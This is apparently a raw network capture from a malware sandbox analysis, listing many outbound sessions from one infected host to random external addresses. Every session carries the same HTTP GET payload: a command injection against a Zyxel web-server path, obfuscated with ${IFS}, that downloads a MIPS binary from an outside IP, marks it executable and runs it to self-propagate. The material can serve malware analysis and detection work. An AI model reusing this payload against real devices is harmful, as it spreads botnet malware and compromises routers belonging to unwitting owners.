                                    Jan 13, 2024 19:02:41.352543116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6251192.168.2.134562077.112.87.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352605104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6252192.168.2.134459692.29.111.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352668047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6253192.168.2.1355718126.218.224.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352704048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6254192.168.2.134448857.255.120.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352746010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6255192.168.2.1334984200.174.197.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352797985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6256192.168.2.133354289.77.94.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352832079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6257192.168.2.1346988203.144.216.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352879047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6258192.168.2.135873472.176.127.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352922916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6259192.168.2.134102636.173.54.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352993011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6260192.168.2.1356574131.66.46.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353033066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6261192.168.2.135662077.187.181.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353101015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6262192.168.2.134113699.157.181.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353164911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6263192.168.2.1346584142.156.106.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353219986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6264192.168.2.1342640134.148.222.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353279114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6265192.168.2.1344042206.10.149.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353344917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6266192.168.2.1347936132.34.63.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353398085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6267192.168.2.1360332171.107.96.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353458881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6268192.168.2.136065249.119.106.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353502035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6269192.168.2.1350312146.31.197.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353543043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6270192.168.2.1346744222.106.25.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353609085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6271192.168.2.1355440222.58.71.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353650093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6272192.168.2.13473661.116.230.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353715897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6273192.168.2.1340242208.6.243.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353768110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6274192.168.2.133959496.253.230.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353832006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6275192.168.2.134277693.44.161.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353904009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6276192.168.2.1334762220.192.18.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.353934050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6277192.168.2.1356526212.233.56.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354012012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6278192.168.2.1345872150.120.25.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354085922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6279192.168.2.1356934204.148.236.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354139090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6280192.168.2.1346476197.155.187.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354183912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6281192.168.2.133332838.124.192.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354253054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6282192.168.2.1349948164.25.214.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354295015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6283192.168.2.1356782120.129.47.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354337931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6284192.168.2.1359868150.58.7.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354382992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6285192.168.2.133333832.60.217.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354425907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6286192.168.2.1344296221.221.122.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354466915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6287192.168.2.134373670.129.7.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354518890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6288192.168.2.1335688114.163.159.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354571104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6289192.168.2.1350170155.145.222.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354626894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6290192.168.2.1349888123.151.231.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354675055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6291192.168.2.1356476202.240.194.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354727030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6292192.168.2.13441245.161.74.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354790926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6293192.168.2.133423842.210.122.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354856968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6294192.168.2.135407272.125.255.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354898930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6295192.168.2.135235413.199.89.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.354964972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6296192.168.2.1337126207.158.94.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355027914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6297192.168.2.133599640.226.240.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355089903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6298192.168.2.13551965.46.158.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355132103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6299192.168.2.1348476105.75.168.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355181932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6300192.168.2.1356882105.206.0.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355216026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6301192.168.2.1341978111.116.201.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355309010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6302192.168.2.134005879.247.136.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355355978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6303192.168.2.1355010182.138.127.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355458021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6304192.168.2.1358364112.172.87.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355514050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6305192.168.2.135633265.241.181.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355566025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6306192.168.2.1341340151.12.43.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355642080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6307192.168.2.1347418183.71.173.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355712891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6308192.168.2.135192482.151.15.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355802059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6309192.168.2.134425686.23.180.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355865002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6310192.168.2.134154445.50.13.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.355967045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6311192.168.2.1356250197.17.216.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356023073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6312192.168.2.135370271.17.63.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356081009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6313192.168.2.1337308104.176.207.227443
                                    TimestampBytes transferredDirectionData
